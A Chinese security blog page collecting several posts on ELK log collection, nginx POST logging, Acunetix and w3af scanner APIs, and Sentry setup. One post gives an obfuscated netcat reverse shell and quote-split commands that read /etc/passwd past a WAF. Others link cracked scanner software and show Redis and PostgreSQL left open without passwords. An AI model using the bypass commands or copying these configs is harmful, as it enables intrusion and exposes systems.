利用RELK进行日志收集

发布时间:April 3, 2018 // 分类:开发笔记,运维工作,python // No Comments

前不久在做应急的总是遇到要求对日志进行分析溯源,当时就想到如果对常见的日志类进行解析后统一入库处理,然后在对相关的IP/URL进行统计归纳。对于溯源之类的很是方便。想到数据量比较大,又要便于分析,就想到了ELK.

搭建一套基于elk的日志分析系统。
系统centos 内存4G 双核

大概架构如此

1.elk搭建

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.2.3.rpm
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.2.3-x86_64.rpm
wget https://artifacts.elastic.co/downloads/logstash/logstash-6.2.3.rpm

rpm -ivh elasticsearch-6.2.3.rpm 
sudo chkconfig --add elasticsearch
/etc/init.d/elasticsearch start

rpm -ivh kibana-6.2.3-x86_64.rpm 
/etc/init.d/kibana start
sudo chkconfig --add kibana

rpm -ivh logstash-6.2.3.rpm
cd /usr/share/logstash
ln -s /etc/logstash ./config

整个elk系统搭建好了,安装redis作为agent收集日志来作为logstash的输入源

wget http://download.redis.io/redis-stable.tar.gz
tar zxf redis-stable.tar.gz 
cd redis-stable
make && make install

修改redis.conf。

bind 0.0.0.0
protected-mode no
daemonize yes
maxclients 1000000

启动redis

sudo redis.conf /etc/
redis-server /etc/redis.conf

Logstash配置文件是JSON格式,放在/etc/logstash/conf.d 。 该配置由三个部分组成:输入,过滤器和输出。

input 数据输入端,可以接收来自任何地方的源数据。
file:从文件中读取
syslog:监听在514端口的系统日志信息,并解析成RFC3164格式。
redis:从redis-server list 中获取
beat:接收来自Filebeat的事件
Filter 数据中转层,主要进行格式处理,数据类型转换、数据过滤、字段添加,修改等,常用的过滤器如下。
grok: 通过正则解析和结构化任何文本。Grok 目前是logstash最好的方式对非结构化日志数据解析成结构化和可查询化。logstash内置了120个匹配模式,满足大部分需求。
mutate: 在事件字段执行一般的转换。可以重命名、删除、替换和修改事件字段。
drop: 完全丢弃事件,如debug事件。
clone: 复制事件,可能添加或者删除字段。
geoip: 添加有关IP地址地理位置信息。
output 是logstash工作的最后一个阶段,负责将数据输出到指定位置,兼容大多数应用,常用的有:
elasticsearch: 发送事件数据到 Elasticsearch,便于查询,分析,绘图。
file: 将事件数据写入到磁盘文件上。
mongodb:将事件数据发送至高性能NoSQL mongodb,便于永久存储,查询,分析,大数据分片。
redis:将数据发送至redis-server,常用于中间层暂时缓存。
graphite: 发送事件数据到graphite。http://graphite.wikidot.com/
statsd: 发送事件数据到 statsd。

编写logstash的配置文件。对所有的数据全盘接受,感谢Mosuan师傅的指导。

input {    
    redis {
        host => '127.0.0.1'
    port => 6379
        password => 'password'
        data_type => 'list'
        key => 'logstash:redis'
    }
}
output {
    elasticsearch { hosts => localhost }
    stdout { codec => rubydebug }
}

Logpara

一个对常见的web日志进行解析处理的粗糙DEMO。

Python 2.7 License

目标

  • 对被请求的URL进行解析,解析出是否常见的攻击方式
  • 对来访的IP进行深度解析,包含经纬度,物理地址
  • 对来访的UA进行深度解析,解析出设备,浏览器种类,是否爬虫
  • 把全部的日志解析了入库,做RELK处理

TO DO

  • 对入库elasticsearch的日志进行处理并展示

Useage

  • 使用之前先修改common/units.py

    redis_host = '192.168.87.222'
    redis_port = 6379
    redis_pass = 'cft67ygv'
    redis_db = 0
    redis_key = 'logstash:redis'
    
  • 使用
Usage: main.py --type IIS|Apache|Tomcat|Nginx --file file|directory

log parser

Options:
  -h, --help   show this help message and exit
  --type=TYPE  chose which log type
  --file=FILE  chose file or directory

脚本地址:https://github.com/0xa-saline/Logpara

导入后的结果类似


单个查看

如果基于nginx还可以收集post数据,在溯源取证以及日志分析都是有很好的帮助。

Bash通配符在命令执行中的应用

发布时间:February 25, 2018 // 分类:运维工作,linux // No Comments

主要是在和基友讨论一个绕过的时候遇到了.后来翻东西的时候发现已经有国外的大神对此已经发布过类似的东西了.既然如此,记录下呗,权当搬运工

首先关于bash通配符

其中的?是匹配一个任意字符.也就是说如果我们平时执行的是cat /etc/passwd可以用?来替代

首先来试试常见的ls

root@bee-box:~# which ls
/bin/ls
root@bee-box:~# echo /???/?s
/bin/ls /bin/ps /sys/fs
root@bee-box:~#

可以用/???/?s来取代.类似的cat也是可以用/???/??t或者/???/c?t等来查找到.如果在绕waf的过程里面应该是可以直接拿出来用的.

root@bee-box:~# echo /???/c?t
/bin/cat
root@bee-box:~# echo /???/??t
/bin/cat /dev/net /etc/apt /etc/opt /etc/rmt /var/opt

试试常见的cat /etc/passwd
我们用/???/??t /???/??ss??来替换

效果直接执行差别不是很大

然而实际上我们测试那个waf的时候发现超过了4个?就不行了

直接上nc的时候就可以换成了

/???/?c -e /???/b??h 2130706433 7088

另外附上一些tips
1.bash不仅仅可以允许连接路径.命令也是可以的。比如在linux里面'可以用来分割字符.
2.\是一个转义的作用而已.不过依旧可以用来替换'

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
$ c\a\t /et\c/passwd

nginx 接受post数据

发布时间:December 6, 2017 // 分类:工作日志,运维工作,开发笔记,linux // No Comments

开始使用的是apache.发现如果需要记录post数据还的使用其他的模块或者去hookapache来实现.后来发现nginx可以记录post数据

log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
             '$status $body_bytes_sent "$http_referer" '
             '"$http_user_agent" $http_x_forwarded_for';
  1. $request_body变量由nginx自身提供,用于记录POST请求日志

最后实现了可以获取post数据的内容

log_format  access  '$remote_addr  $remote_user  [$time_local]  $request '
             '$status  $body_bytes_sent  $http_referer   '
             '$http_user_agent $http_x_forwarded_for [$request_body]';

另外一个可以记录cookie和主机的

log_format  access  '$remote_addr  [$time_local]  $host $request $status $http_referer $http_user_agent $http_cookie [$request_body]';  

考虑下body_bytes_sent是不是可以不用
日志的地方

access_log  /data/logs/access.log access;

重启下nginx后测试

curl -d cmd=`id|base64` http://0cx.cc/\?cmd\=$(whoami) --refer $(id|base64) --user-agent $(id|base64)

抓取到的日志是

参考文档
Nginx 使用 lua-nginx-module 来获取post请求中的request和response信息
http://www.jianshu.com/p/78853c58a225
解决nginx在记录post数据时 中文字符转成16进制的问题
http://www.jianshu.com/p/8f8c2b5ca2d1

wvs如何应对频频提示激活

发布时间:September 15, 2017 // 分类:工作日志,开发笔记,运维工作 // 3 Comments

今天基友和我说起来wvs总是提示激活的时候没发扫描啊.于是就想了下咋个自动化或者快速的解决这个问题.总的来说我暂时知道的方法有两个。认真的激活或者禁止和服务器通信,就自然不会再激活

1.自动激活
虽然禁止了升级提示的频率有所减少。但是依旧会提示.所以就想办法搞了一个自动激活的脚本.加入计划任务。每天执行一次就好了…^_^

WScript.Echo "wvs auto Activation by Saline"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "Activation.exe"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 100
WScript.Echo "Activation finished"
WshShell.Run "proto.exe awvs://launch/"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 100
WScript.Echo "wvs restart finish"

把里面的chrome.exe换成自己的浏览器的程序就好了.把脚本保存为xxx.vbs.放入到wvs的安装目录.重新建一个bat

cd C:\Program Files (x86)\Acunetix 11\11.0.170951158
cscript reactive.vbs
exit

然后把这个bat加入计划任务

schtasks  /create  /tn  wvs_active /tr  c:\wvs_task.bat  /sc  DAILY /st  00:30:00  


好不容易熬到了00:30.不知道为嘛要设定这个时间.

本来想录制gif的.奈何没有搞定.
http://www.iqiyi.com/w_19rv72o4ch.html

2.把地址加入hosts
这个是一个大牛提出来的.我还没有测试.

还有更多的期望大牛们来提供补充

调用Acunetix11 API接口实现扫描

发布时间:May 19, 2017 // 分类:工作日志,开发笔记,运维工作,linux,windows // 12 Comments

实际上关于api的文档很少很少.从网络中找了好会才发现俩

1.获取API-KEY
首先来获取一个API-KEY
通过右上角Administrator--Profile

2.建立一个扫描目标

在演示一个扫描之前您将需要会在您想要扫描的网站上建立一个扫描目标。您将需要利用(POST)目标终端去实现它。使用cURL:

curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: apikey" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnweb.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"

其中:

- https://127.0.0.1:3443 - 是Acunetix11端口URL(就是你安装了Acunetix11 的电脑)
- API-KEY - 这是Acunetix11的API-KEY,如果你安装了就可以在页面右上角的Administration中生成KEY了。
- http://testphp.vulnweb.com - 是您想要添加的一个扫描目标网址.务必带上http|https
- testphp.vulnweb.com - 是描述扫描目标的词句(非必填)
- 10 - 是目标的临界值 (Critical [30], High [20], Normal [10], Low [0])

命令成功之后会201,以及其它一些数据,其中包括target_id(返回结果中locations最后的一截字符串)


C:\Users\Administrator\Desktop
> curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnw b.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"
{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "criticality": 10,
 "address": "http://testphp.vulnweb.com/",
 "description": "testphp.vulnweb.com"
}

3.在一个创建好的目标上运行一个扫描

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"

其中:

- https://127.0.0.1:3443 - 是Acunetix11端口URL
- API-KEY - 是您在第1步中生成的的API key
- TARGET-ID - 是您从之前的JSON回复中得到的target_id值
- 11111111-1111-1111-1111-111111111111 - 是扫描profile ID。通过使用(GET)scanning_profiles 端点获得的列表,列表包括了扫描profile和他们的ID。

关于获取target_id

> curl -k https://127.0.0.1:3443/api/v1/scanning_profiles --header "X-Auth: API_KEY"
{
 "scanning_profiles": [
  {
   "custom": false,
   "checks": [],
   "name": "Full Scan",
   "sort_order": 1,
   "profile_id": "11111111-1111-1111-1111-111111111111"
  },
  {
   "custom": false,
   "checks": [],
   "name": "High Risk Vulnerabilities",
   "sort_order": 2,
   "profile_id": "11111111-1111-1111-1111-111111111112"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Cross-site Scripting Vulnerabilities",
   "sort_order": 3,
   "profile_id": "11111111-1111-1111-1111-111111111116"
  },
  {
   "custom": false,
   "checks": [],
   "name": "SQL Injection Vulnerabilities",
   "sort_order": 4,
   "profile_id": "11111111-1111-1111-1111-111111111113"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Weak Passwords",
   "sort_order": 5,
   "profile_id": "11111111-1111-1111-1111-111111111115"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Crawl Only",
   "sort_order": 6,
   "profile_id": "11111111-1111-1111-1111-111111111117"
  }
 ]
}

启动一个扫描任务

> curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"
HTTP/1.1 201 Created
Pragma: no-cache
Content-type: application/json; charset=utf8
Cache-Control: no-cache, must-revalidate
Expires: -1
Location: /api/v1/scans/a6e36dd0-9976-46a7-9740-29f897f911d6
Date: Fri, 19 May 2017 03:40:12 GMT
Transfer-Encoding: chunked

{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "ui_session_id": null,
 "schedule": {
  "disable": false,
  "start_date": null,
  "time_sensitive": false
 },
 "profile_id": "11111111-1111-1111-1111-111111111111"
}

4.查看任务扫描的状态

先获取扫描任务的scan_id

curl -k --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth:API_KEY" --header "content-type: application/json"

查看具体scan_id 的扫描细节

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46 --header "X-Auth:API-KEY" --header "content-type: application/json"

5.停止任务

apiurl+/scans/+scan_id+/abort

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46/abort --header "X-Auth:API-KEY" --header "content-type: application/json"

6.生成模板

获取模板

curl -k --url https://127.0.0.1:3443/api/v1/report_templates --header "X-Auth:API-KEY" --header "content-type: application/json"

生成报告

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/reports --header "X-Auth: API-KEY" --header "content-type: application/json" --data "{\"template_id\":\"11111111-1111-1111-1111-111111111111\",\"source\":{\"list_type\":\"scans\", \"id_list\":[\"SCAN-ID\"]}}

其中:
- https://127.0.0.1:3443 - 是Acunetix11端口URL
- API-KEY - 是您在第1步中生成的的API key
- SCAN-ID - 是您从之前的JSON回复中获得的scan_id。

会有一个201 HTTP回复显示了请求是成功的 ,并且会包含一个带有id的Location header(例如 Location: /api/v1/reports/54f402f6-7a60-4934-952f-45bfe6c4abf4 )。一旦报告被URL: https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.pdf 访问,这个id可以被用来下载报告。最新版本还会提供HTML版本的报告,并且可以从https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.html 访问。

参考

1.https://github.com/jenkinsci/acunetix-plugin/blob/master/src/main/java/com/acunetix/Engine.java
2.http://blog.csdn.net/qq_31497435/article/details/64441474

有小伙伴问哪里有这个下载

来自吾爱大神Hmily作品,不多说。
原帖:http://www.52pojie.cn/thread-609275-1-1.html
网盘:http://pan.baidu.com/s/1c1JoyBm 密码:hyue
【由于之前被举报无法分享,这次原文件和补丁都加了压缩密码:www.52pojie.cn】

如何开启远程访问
安装的时候选择允许远程访问

#!/usr/bin/python
# -*- coding: utf-8 -*-

import json
import requests
import requests.packages.urllib3
'''
import requests.packages.urllib3.util.ssl_
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'ALL'

or 

pip install requests[security]
'''
requests.packages.urllib3.disable_warnings()

tarurl = "https://127.0.0.1:3443/"
apikey="yourapikey"
headers = {"X-Auth":apikey,"content-type": "application/json"}

def addtask(url=''):
    #添加任务
    data = {"address":url,"description":url,"criticality":"10"}
    try:
        response = requests.post(tarurl+"/api/v1/targets",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        return result['target_id']
    except Exception as e:
        print(str(e))
        return

def startscan(url):
    # 先获取全部的任务.避免重复
    # 添加任务获取target_id
    # 开始扫描
    targets = getscan()
    if url in targets:
        return "repeat"
    else:
        target_id = addtask(url)
        data = {"target_id":target_id,"profile_id":"11111111-1111-1111-1111-111111111111","schedule": {"disable": False,"start_date":None,"time_sensitive": False}}
        try:
            response = requests.post(tarurl+"/api/v1/scans",data=json.dumps(data),headers=headers,timeout=30,verify=False)
            result = json.loads(response.content)
            return result['target_id']
        except Exception as e:
            print(str(e))
            return

def getstatus(scan_id):
    # 获取scan_id的扫描状况
    try:
        response = requests.get(tarurl+"/api/v1/scans/"+str(scan_id),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        status = result['current_session']['status']
        #如果是completed 表示结束.可以生成报告
        if status == "completed":
            return getreports(scan_id)
        else:
            return result['current_session']['status']
    except Exception as e:
        print(str(e))
        return

def getreports(scan_id):
    # 获取scan_id的扫描报告
    data = {"template_id":"11111111-1111-1111-1111-111111111111","source":{"list_type":"scans","id_list":[scan_id]}}
    try:
        response = requests.post(tarurl+"/api/v1/reports",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = response.headers
        report = result['Location'].replace('/api/v1/reports/','/reports/download/')
        return tarurl.rstrip('/')+report
    except Exception as e:
        print(str(e))
        return

def getscan():
    #获取全部的扫描状态
    targets = []
    try:
        response = requests.get(tarurl+"/api/v1/scans",headers=headers,timeout=30,verify=False)
        results = json.loads(response.content)
        for result in results['scans']:
            targets.append(result['target']['address'])
            print result['scan_id'],result['target']['address'],getstatus(result['scan_id'])#,result['target_id']
        return list(set(targets))
    except Exception as e:
        raise e

if __name__ == '__main__':
    print startscan('http://testhtml5.vulnweb.com/')

实际测试效果

ps。在屌大牛的帮助下。抓到了pg数据库的连接信息.然后连蒙带猜的弄到了连接密码【ps:其实配置文件里面写好了本地连接压根不需要密码23333.好尴尬】

有小伙伴问我如何获取详细数据.仔细思考了一圈,发现有一个办法.就是开启postgresql允许远程连接
1.找到postgresql.conf位置

C:\Program Files (x86)\Acunetix 11
> find \ -name "postgresql.conf"
\/ProgramData/Acunetix 11/db/postgresql.conf

在C:\ProgramData\Acunetix 11\db下.

打开后修改第一行地址localhost为*

#listen_addresses = 'localhost'
listen_addresses = '*'

再到同目录下找到pg_hba.conf。在# IPv4 local connections: 行下,添加一行内容为:

# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
host    all             wvs             192.168.0.0/24          trust

此处解释:192.168.0.0/24。意思为允许192.168.0段内的ip可以无密码连接。添加完成后,保存。

重启Acunetix Database服务.

基于docker的sentry搭建过程

发布时间:April 13, 2017 // 分类:运维工作,开发笔记,linux,windows,python,生活琐事 // 2 Comments

最近拜读董伟明大牛的《python web实战开发》发现他推荐了一个神器sentry.恰好不久前还在和小伙伴讨论如何记录try--except的异常信息。发现刚好可以用上.

** 简介 **

Sentry’s real-time error tracking gives you insight into production deployments and information to reproduce and fix crashes.---官网介绍
Sentry是一个实时事件日志记录和汇集的日志平台,其专注于错误监控,以及提取一切事后处理所需的信息。他基于Django开发,目的在于帮助开发人员从散落在多个不同服务器上的日志文件里提取发掘异常,方便debug。Sentry由python编写,源码开放,性能卓越,易于扩展,目前著名的用户有Disqus, Path, mozilla, Pinterest等。它分为客户端和服务端,客户端就嵌入在你的应用程序中间,程序出现异常就向服务端发送消息,服务端将消息记录到数据库中并提供一个web节目方便查看。

** 安装 **
通过官方文档https://docs.sentry.io/ 可以得知,安装服务有两种方式,一种是使用Python,这种方式个人感觉比较麻烦。于是选择了第二种方式:使用docker[官方更加推荐]

这种方法需要先安装** docker **和 ** docker-compose **

0x01 安装docker
0x02 安装docker-compose
0x03 获取sentry
0x04 搭建sentry

我本地安装过了docker和docker-compose.直接从第三步开始

git clone https://github.com/getsentry/onpremise.git

获取到本地之后,就可以根据他的README.md开始着手搭建了,整个过程还是比较顺利的。

** step 1.构建容器并创建数据库和sentry安装目录 **

mkdir  -p data/{sentry,postgres}

** step 2.生成secret key并添加到docker-compose文件里 **

sudo docker-compose run --rm web config generate-secret-key

这个过程时间有点长。其间会提示创建superuser,用户名是一个邮箱,这个邮箱今后会收到sentry相关的消息,口令可以随便设置,只要自己记得住就可以了。

最后会在命令行输出一串乱七八糟的字符(形如:** z#4zkbxk1@8r*t=9z^@+q1=66zbida&dliunh1@p–u#zv63^g ** )
这个就是 secretkey,将这串字符复制到docker-compose.yml文件中并保存.取消SENTRY_SECRET_KEY的注释,并把刚刚复制的字符串插入其中,类似如下

** step 3.重建数据库,并创建sentry超级管理员用户 **

sudo docker-compose run --rm web upgrade

创建用户,sentry新建的时候需要一个超级管理员用户

** step 4.启动所有的服务 **

sudo docker-compose up -d


至此sentry搭建完成!

实际效果

from raven import Client
client = Client('http://f4e4bfb6d653491281340963951dde74:10d7b52849684a32850b8d9fde0168dd@127.0.0.1:9000/2')
    def find_result(self, sql,arg=''):
        try:
            with self.connection.cursor() as cursor:
                if len(arg)>0:
                    cursor.execute(sql,arg)
                else:
                    cursor.execute(sql)
                result = cursor.fetchone()
                self.connection.commit()
                return result

        except Exception, e:
            client.captureException()
            print sql,str(e)

print sql,str(e)

输出错误

client.captureException()

记录的错误日志

About w3af_api

发布时间:November 23, 2016 // 分类:开发笔记,运维工作,工作日志,linux,代码学习,python,生活琐事 // No Comments

今天看到了一个saas产品,和作者聊了下,发现是基于w3af_api来实现的。然后自己补充了其他的类型.感觉很厉害的样子。于是跑过来看了下w3af。相关的文档在这里

w3af算的上是老牌的东西了。反正我是比较少用的,总是感觉效果没有理想的那么好。比如它的爬虫模块太久没有更新了.导致现在出现的很多动态脚本的结果没发准确抓取到。对比下

- http://testphp.acunetix.com/
- http://testphp.acunetix.com/AJAX/
- http://testphp.acunetix.com/AJAX/index.php
- http://testphp.acunetix.com/AJAX/styles.css
- http://testphp.acunetix.com/Flash/
- http://testphp.acunetix.com/Flash/add.fla
- http://testphp.acunetix.com/Flash/add.swf
- http://testphp.acunetix.com/Mod_Rewrite_Shop/
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/1.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/2.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/3.jpg
- http://testphp.acunetix.com/artists.php
- http://testphp.acunetix.com/cart.php
- http://testphp.acunetix.com/categories.php
- http://testphp.acunetix.com/disclaimer.php
- http://testphp.acunetix.com/guestbook.php
- http://testphp.acunetix.com/hpp/
- http://testphp.acunetix.com/hpp/params.php
- http://testphp.acunetix.com/images/logo.gif
- http://testphp.acunetix.com/images/remark.gif
- http://testphp.acunetix.com/index.php
- http://testphp.acunetix.com/listproducts.php
- http://testphp.acunetix.com/login.php
- http://testphp.acunetix.com/product.php
- http://testphp.acunetix.com/redir.php
- http://testphp.acunetix.com/search.php
- http://testphp.acunetix.com/secured/
- http://testphp.acunetix.com/secured/newuser.php
- http://testphp.acunetix.com/secured/style.css
- http://testphp.acunetix.com/showimage.php
- http://testphp.acunetix.com/signup.php
- http://testphp.acunetix.com/style.css
- http://testphp.acunetix.com/userinfo.php

这个是它抓取到的。然后自己前几天琢磨的crawl抓到的【在抓取前先fuzz了dir。所以基本满足需求】

主题不在这边。主要是针对w3af_api。关于它的文档可以看这边。简答的描述下

1.启动,主要是两个方式,一个是直接运行

$ ./w3af_api
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

另外一个是docker

$ cd extras/docker/scripts/
$ ./w3af_api_docker
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

2.认证。可以自行更换密码的。密码默认的加密方式是sha512sum。

生成密码

$ echo -n "secret" | sha512sum
bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2  -

$ ./w3af_api -p "bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

也可以把账户密码等信息写入yml配置文件来加载启动。

3.api使用方式

开始一个新的扫描 [POST] /scans/
查看扫描状态 GET /scans/0/status
获取相关的漏洞信息使用 GET /scan/kb/
删除相关的信息  DELETE /scans/0/
获取扫描信息  GET  /scans/
暂停扫描  GET /scans/0/pause
停止扫描  GET /scans/0/stop
查看扫描日志  GET /scans/0/log

实际栗子来尝试一次扫描

import requests
import json

data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': ['http://testphp.acunetix.com']}

response = requests.post('http://127.0.0.1:5000/scans/',
                         data=json.dumps(data),
                         headers={'content-type': 'application/json'})
                         
print response.text
scan_profile    必须包含的内容w3af扫描配置文件(文件名)
target_urls      w3af要进行爬虫的url列表

查看扫描状态

查看扫描状态

查看相关的漏洞信息

具体某个漏洞的信息

{
  "attributes": {
    "db": "MySQL database",
    "error": "mysql_"
  },
  "cwe_ids": [
    "89"
  ],
  "cwe_urls": [
    "https://cwe.mitre.org/data/definitions/89.html"
  ],
  "desc": "SQL injection in a MySQL database was found at: \"http://testphp.acunetix.com/userinfo.php\", using HTTP method POST. The sent post-data was: \"uname=a%27b%22c%27d%22&pass=FrAmE30.\" which modifies the \"uname\" parameter.",
  "fix_effort": 50,
  "fix_guidance": "The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.\n\nAdditionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.",
  "highlight": [
    "mysql_"
  ],
  "href": "/scans/0/kb/29",
  "id": 29,
  "long_description": "Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.\n\nTo meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.\n\nThe successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.\n\nThis injection was detected as the tool was able to cause the server to respond to the request with a database related error.",
  "name": "SQL injection",
  "owasp_top_10_references": [
    {
      "link": "https://www.owasp.org/index.php/Top_10_2013-A1",
      "owasp_version": "2013",
      "risk_id": 1
    }
  ],
  "plugin_name": "sqli",
  "references": [
    {
      "title": "SecuriTeam",
      "url": "http://www.securiteam.com/securityreviews/5DP0N1P76E.html"
    },
    {
      "title": "Wikipedia",
      "url": "http://en.wikipedia.org/wiki/SQL_injection"
    },
    {
      "title": "OWASP",
      "url": "https://www.owasp.org/index.php/SQL_Injection"
    },
    {
      "title": "WASC",
      "url": "http://projects.webappsec.org/w/page/13246963/SQL%20Injection"
    },
    {
      "title": "W3 Schools",
      "url": "http://www.w3schools.com/sql/sql_injection.asp"
    },
    {
      "title": "UnixWiz",
      "url": "http://unixwiz.net/techtips/sql-injection.html"
    }
  ],
  "response_ids": [
    1494
  ],
  "severity": "High",
  "tags": [
    "web",
    "sql",
    "injection",
    "database",
    "error"
  ],
  "traffic_hrefs": [
    "/scans/0/traffic/1494"
  ],
  "uniq_id": "82f91e8c-759b-43b9-82cb-59ff9a38a836",
  "url": "http://testphp.acunetix.com/userinfo.php",
  "var": "uname",
  "vulndb_id": 45,
  "wasc_ids": [],
  "wasc_urls": []
}

感觉有这些差不多了。可以开始扫描,暂停,停止,删除。还能获取到具体的某个漏洞细节以及修复方案。加上api独有的特效,是可以做分布式的.

import pika
import requests
import json
import sys
import time
import sqlalchemy as db
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os

# database stuffs
Base = declarative_base()

# scan
class Scan(Base):
    __tablename__ = 'scans'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer)
    description = db.Column(db.Text)
    target_url = db.Column(db.String(128))
    start_time = db.Column(db.Time)
    scan_time = db.Column(db.Time, nullable=True)
    profile = db.Column(db.String(32))
    status = db.Column(db.String(32))
    deleted = db.Column(db.Boolean, default=False)
    run_instance = db.Column(db.Unicode(128))
    num_vulns = db.Column(db.Integer)
    vulns = db.orm.relationship("Vulnerability", back_populates="scan")
    user_id = db.Column(db.String(40))

    def __repr__(self):
        return '<Scan %d>' % self.id

# vuln
class Vulnerability(Base):
    __tablename__ = 'vulns'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer) # relative to scans
    stored_json = db.Column(db.Text) # inefficient, might fix later
    deleted = db.Column(db.Boolean, default=False)
    false_positive = db.Column(db.Boolean, default=False)
    scan_id = db.Column(db.Integer, db.ForeignKey('scans.id'))
    scan = db.orm.relationship("Scan", back_populates="vulns")

    def __init__(self, id, json, scan_id):
        self.relative_id = id
        self.stored_json = json
        self.scan_id = scan_id

    def __repr__(self):
        return '<Vuln %d>' % self.id

engine = db.create_engine(os.environ.get('SQLALCHEMY_CONN_STRING'))
Session = sessionmaker(bind=engine)
sess = Session()

credentials = pika.PlainCredentials(os.environ.get('TASKQUEUE_USER'), os.environ.get('TASKQUEUE_PASS'))
con = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get('TASKQUEUE_HOST'),credentials=credentials))

channelTask = con.channel()
channelTask.queue_declare(queue='task', durable=True)

channelResult = con.channel()
channelResult.queue_declare(queue='result')

# URL to w3af REST API interface instance
server = sys.argv[1]

vul_cnt = 0

def freeServer(sv, href):
    r = requests.delete(sv + href)
    print r.text

def isFree(sv):
    r = requests.get(sv + '/scans/')
    print r.text
    items = json.loads(r.text)['items']
    if len(items) == 0:
        return True
    # number of items > 0
    item = items[0]
    if item['status'] == 'Stopped':
        freeServer(sv, item['href'])
        return True
    return False

def sendTaskDone(server, href):
    data = {}
    data['server'] = server
    data['href'] = href
    message = json.dumps(data)
    channelResult.basic_publish(exchange='',
                        routing_key='result',
                        body=message)

def scann(target):
    data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': [target]}
    response = requests.post(server + '/scans/',
                        data=json.dumps(data),
                        headers={'content-type': 'application/json'})

    print response.status_code
    print response.data
    print response.headers

def getVul(sv, href):
    r = requests.get(sv + href)
    #db.insert(r.text)

def getVulsList(sv, href):
    global vul_cnt
    r = requests.get(sv + href + 'kb')
    vuls = json.loads(r.text)['items']
    l = len(vuls)
    if l > vuls_cnt:
        for vul in vuls:
            if vul['id'] >= vul_cnt:
                getVul(sv, vul['href'])
    vul_cnt = l
        
# on receiving message
def callback(ch, method, properties, body):
    print('Get message %s', body)
    task = json.loads(body)
